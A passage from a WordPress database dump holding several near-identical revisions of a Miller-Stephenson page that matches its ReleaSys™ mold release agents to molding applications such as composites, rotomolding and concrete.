INSERT INTO `wp_posts` VALUES (4526, 2, '2017-06-08 18:21:16', '2017-06-08 18:21:16', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="polyurethane"></a></p>\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:21:16', '2017-06-08 18:21:16', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4527, 2, '2017-06-08 18:22:37', '2017-06-08 18:22:37', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n<p><a name="polyurethane"></a></p>\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:22:37', '2017-06-08 18:22:37', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4528, 2, '2017-06-08 18:24:27', '2017-06-08 18:24:27', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" link="https://www.miller-stephenson.com/product/urethane-mold-release-agent/" target="https://www.miller-stephenson.com/product/urethane-mold-release-agent/"]\r\n\r\n\r\n[/col]\r\n<p><a name="rotational plastics"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4360" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rotational Plastics (Rotomolding)</h2>\r\n<p>Rotational Molding is a dynamic industry which utilizes an ever-widening variety of thermoplastic resins. In response to this evolution, Miller-Stephenson has developed a robust portfolio of specialized release agents. These formulations are tailored to meet rotational molding efficiency challenges such as shorter, hotter cycles and tight-tolereance, complex molds. Our <b>ReleaSys™ </b> product line binds strongly to the mold surface ensuring no transfer, impeccable surface finish, and multiple releases per application</p>\r\n[button text="ReleaSys™ RM" link="https://www.miller-stephenson.com/product/rotational-molding-release-agent/"]\r\n\r\n<p><a name="polyurethane"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n[ux_image id="4366" image_size="medium"]\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Polyurethane-TPU</h2>\r\n<p>Miller-Stephenson understands the demands of the polyurethane molding industry. The numerous variants of polyurethane(High Resiliency, Visco-Elastic, Spray Skin, Rigid and Flexible Foam, etc) make the demands on a release agent very high. Miller-Stephenson’s <b>ReleaSys™</b> release systems are specially formulated to deliver superior part release, cleaner molds, reduced build up, excellent surface cosmetics, and less downtime. Our high performance chemistry adheres tenaciously to mold surfaces such as aluminium, steel, urethane, epoxy, and fiberglass. ReleaSys provides the critical protection to your mold surface while delivering highly effective release properties.</p>\r\n[button text="ReleaSys™ 8800" link="https://www.miller-stephenson.com/product/composite-mold-release-agent/" target="https://www.miller-stephenson.com/product/composite-mold-release-agent/"]\r\n\r\n[/col]\r\n<p><a name="rubber"></a></p>\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4387" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Rubber / Silicone / Elastomers</h2>\r\n<p>From Fluorosilicones to EPDM, Natural Rubber to Nitrile, and Miller-Stephenson has been delivering unmatched release performance to molders for over 50 years. Whether you are performing injection, compression or transfer molding, Miller-Stephenson’s <b>ReleaSys™</b> product line delivers ease of demolding, non-transferring, and numerous releases per application. Much of our advanced chemistry is water-based, low or no VOC, and low odor. Miller-Stephenson is dedicated to providing a cost-effective and efficient mold release for your application.</p>\r\n[button text="ReleaSys™ 8200" link="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/" target="https://www.miller-stephenson.com/product/ptfe-water-based-release-agents/"]\r\n\r\n<p><a name="injection"></a></p>\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4332" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Injection Plastics Mold Release</h2>\r\n<p>There are numerous resins used in plastic injection molding,but regardless of the substrate, critical performance criteria exist for all mold release: Tenacious surface adhesion, protection of the mold surfaces, and superior part quality.Our <b>ReleaSys™</b> product line binds-to and protects even the most complex, highly polished molds, provides optimizes resin flow and generates higher part quality and lower scrap rates.</p>\r\n[button text="ReleaSys™ 9800" link="https://www.miller-stephenson.com/product/mold-release-coating/" target="https://www.miller-stephenson.com/product/mold-release-coating/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4337" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Fiberglass Mold Release</h2>\r\n<p>Miller-Stephenson delivers the most durable, highest performing mold release agents to the aerospace and fiberglass industries. Our products provide multiple releases, critical tooling protection, and no transfer with only a single application. No time-consuming mold priming or sealing required. Whether you are doing hand layup, spray layup, filament winding, etc <b>ReleaSys™</b> has a cost-effective, efficient solution for you.</p>\r\n[button text="ReleaSys™ 9900" link="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/" target="https://www.miller-stephenson.com/product/releasys-9900-fiberglass-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4391"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Pre-Cast / Reinforced Concrete</h2>\r\n<p>Miller-Stephenson has a developed a high-performance concrete release agent specifically designed for release of complex, challenging concrete mold designs. Our product minimizes/eliminates "bug-holes", provides high surface quality, consistent color pigmentation, and accurate replication of natural stone patterns. Most importantly, <b>ReleaSys™ CR </b> achieves all of this in a highly efficient and cost-effective system..</p>\r\n[button text="ReleaSys™ CR" link="https://www.miller-stephenson.com/product/concrete-release-agent/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4430"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n<h2>Custom Formulations</h2>\r\n<p>Didn\'t find your specific application? Miller-Stephenson\'s dynamic Engineering and Research Team can quickly address your application and develop a unique release agent solution.We understand that not every "off-the-shelf" product is right for each customer.Therefore we are ready and capable to develop a solution for you. Simple click on the button below and submit your request</p>\r\n[button text="Product InQuiry" link="https://www.miller-stephenson.com/tech-support/"]\r\n\r\n\r\n[/col]\r\n\r\n[/row]\r\n[divider align="center" width="500px"]\r\n\r\n\r\n[/section]', 'Choosing ReleaSys™ By Application', '', 'inherit', 'closed', 'closed', '', '4321-revision-v1', '', '', '2017-06-08 18:24:27', '2017-06-08 18:24:27', '', 4321, 'https://www.miller-stephenson.com/4321-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4529, 2, '2017-06-08 18:26:40', '2017-06-08 18:26:40', '[section label="Media Left Large" bg_color="rgb(247, 247, 247)" bg_overlay="rgba(255, 255, 255, 0.85)" padding="0px"]\r\n\r\n[ux_banner height="400px" bg="4180" bg_overlay="rgba(0, 0, 0, 0.2)"]\r\n\r\n[text_box text_color="dark" hover="fade-out" width="36" scale="79" padding="5px 30px 10px 30px" position_x="95" position_y="95" bg="rgba(255, 255, 255, 0.94)" depth="4"]\r\n\r\n<p>Miller-Stephenson’s exclusive mold release product line, <strong>ReleaSys™</strong>, offers advanced chemistry and modern, eco-friendly formulations for the molding industry. Our products deliver superior value through their combination of innovative technology, ease of application and exceptional cost-effectiveness. However, it is not always easy for engineers and plant managers to know which grade of <strong>ReleaSys™</strong> would perform best in their manufacturing operation. To help aid our customers we have simplified the selection process by consolidating our products into application-specific sections below.</p>\r\n\r\n[/text_box]\r\n\r\n[/ux_banner]\r\n[divider align="center" width="500px"]\r\n\r\n<p><a name="advanced composites"></a></p>\r\n\r\n[button text="ADVANCED COMPOSITES" link="#advanced composites"]\r\n\r\n[button text="ROTATIONAL PLASTIC" link="#rotational plastics"]\r\n\r\n[button text="POLYURETHANE" link="#polyurethane"]\r\n\r\n[button text="RUBBER-SILICONE-ELASTOMER" link="#rubber"]\r\n\r\n[button text="INJECTION PLASTICS" link="#injection"]\r\n\r\n[button text="FIBERGLASS" link="#fiber"]\r\n\r\n[button text="PRECAST / REINFORCED CONCRETE"]\r\n\r\n[button text="CUSTOM FORMULATIONS"]\r\n\r\n[divider align="center" width="500px"]\r\n\r\n[row style="collapse" width="full-width" v_align="middle"]\r\n\r\n[col span="6" span__sm="12"]\r\n\r\n[ux_image id="4351" image_size="medium"]\r\n\r\n\r\n[/col]\r\n[col span="6" span__sm="12" padding="10% 10% 10% 10%" align="center" max_width="520px"]\r\n\r\n\r\n<h2>Advanced Composites</h2>\r\n<p>Modern composites and fiber-reinforced materials demand innovative, efficient mold release solutions. Products for this application need to, adhere strongly to the mold surface, cure quickly and provide multiple releases per application with no contaminating transfer. <b>ReleaSys™ </b> technology provides a simple, yet sophisticated mold release chemistry for operators to employ. Application of only a single-coat of ReleaSys is required, no sealers or primers required.</p>\r\n[button text="ReleaSys™ 8900" 